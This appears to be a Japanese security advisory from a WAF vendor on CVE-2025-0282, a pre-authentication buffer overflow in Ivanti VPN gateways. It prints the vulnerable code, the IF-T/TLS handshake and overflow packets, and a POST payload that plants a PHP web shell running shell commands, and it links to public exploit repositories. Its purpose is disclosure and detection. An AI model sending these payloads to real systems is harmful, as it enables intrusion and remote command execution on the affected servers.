この脆弱性は、Ivanti の Connect Secure、Policy Secure、ZTA Gateway 製品における認証前の RCE 脆弱性で、IF-T/TLS プロトコル通信中にバッファオーバーフローを悪用しようとするものです。
この脆弱性はIvanti Connect SecureおよびIvanti ZTA Gateway製品の22.7R2.5でパッチが適用されており、AIWAFは関連する脆弱性を継続的に監視している。
1. 概要
Ivanti社のSSL VPNソリューションおよびIPSソリューションの製品ラインであるConnect Secure、Policy Secure、およびZTA Gatewayは、最近、同社のプラットフォームで発見されたバッファオーバーフローベースの認証前RCE脆弱性であるCVE-2025-0282の分析を公表した。
出典 : https://www.helpnetsecurity.com/2025/01/08/ivanti-exploited-connect-secure-zero-day-cve-2025-0282-cve-2025-0283/
2. 攻撃タイプ
CVE-2025-0282は、IvantiのConnect Secure、Policy Secure、ZTA Gateway製品に存在する認証前のRCE脆弱性で、これらの製品で使用されているオープンソースのVPNクライアントであるOpenConnectで使用されているIF-T/TLSプロトコル通信のバッファオーバーフローを悪用したRCE攻撃が可能です。
この脆弱性を分析した watchtowr によると、プロトコルの通信を担当するコードの一部が、clientCapabilities 変数に対して strncpy 関数を使用する際に、バッファのサイズではなく、入力文字列のサイズをコピーするように誤って記述されており、その結果、256 バイトを超える文字が入力された場合に BOF が発生するとのことです。
watchtowrによって脆弱性があると分析されたコードには、以下のようなものがある:
...
char dest[256];
clientCapabilities = getKey(req, "clientCapabilities");
if ( clientCapabilities != NULL )
{
clientCapabilitiesLength = strlen(clientCapabilities);
if ( clientCapabilitiesLength != 0 )
connInfo->clientCapabilities = clientCapabilities;
}
}
memset(dest, 0, sizeof(dest));
strncpy(dest, connInfo->clientCapabilities, clientCapabilitiesLength);
...
攻撃者はこの部分を利用して、まずGETリクエストを送信してIF-T/TLSリクエストを行い、プロトコル仕様に従ってソケット通信を進めてRCE攻撃を試みる。
IF-T/TLSプロトコル通信要求 :
GET / HTTP/1.1
Host: 10.0.0.206
User-Agent: BishopFox
Content-Type: EAP
Upgrade: IF-T/TLS 1.0
Content-Length: 0
その後に送信するソケットリクエストは:
\x00\x00U\x97\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\x00\x00\x01\x02\x02
\x00\x00\nL\x00\x00\x00\x88\x00\x00\x00t\x00\x00\x00\x01clientHostname=BishopFox clientIp=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\x00
\x00\x00\nL\x00\x00\x00\x88\x00\x00\x00\x1b\x00\x00\x00\x02anonymous\n\x00
あるいは、バッファオーバーフローを引き起こす構文とWebshell構文を組み合わせて、POSTリクエストで送信する攻撃もあります。
POST リクエストによる BOF および Webshell アップロード :
POST /dana-na/auth/url_default/welcome.cgi HTTP/1.1
Host: 10.0.0.206
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`\xa3\x04\x08BBBB\x08\xb0\x04\x08echo \'<?php\n// Usage: http://target.com/shell.php?cmd=<command>\n\nif (isset($_GET[\'cmd\'])) {\n $cmd = $_GET[\'cmd\'];\n echo "<pre>" . shell_exec($cmd) . "</pre>";\n} else {\n echo "No command provided.";\n}\n?>\n\' > /shell.php'
3. 対応
IvantiはCVE-2025-0282に対するパッチをリリースしており、Ivanti Connect SecureおよびIvanti ZTA Gateways製品はバージョン22.7R2.5以降にアップデートすることで脆弱性に対応できるが、Ivanti Policy Secure製品はまだパッチが適用されていないため、インターネットへの露出を避けるためにIvantiの推奨ガイドラインに従う必要がある。
この脆弱性については、IF-T/TLS プロトコル環境で発生する攻撃は AIWAF パターンの対象外となっているようだが、Webshell と組み合わせた攻撃は「Webshell」パターンでほぼ検知されている。
4. 結論
昨年から今年にかけて、Ivanti の製品やソリューションに対して様々な脆弱性が発見され、報告されています。その中には、認証なしで RCE 攻撃を行うことができるため、他の脆弱性よりも危険性が高く、最新バージョンへの迅速なアップデートが必要なものもあります。
当社のAIWAF製品では、Ivanti Connect Secure、Policy Secure、ZTA Gatewayの脆弱性に対応するパターンを開発しており、今後も関連する脆弱性が発見された場合には迅速に対応していきます。
5. 参考文献
- https://labs.watchtowr.com/do-secure-by-design-pledges-come-with-stickers-ivanti-connect-secure-rce-cve-2025-0282/
- https://github.com/sfewer-r7/CVE-2025-0282
- https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day
- https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit
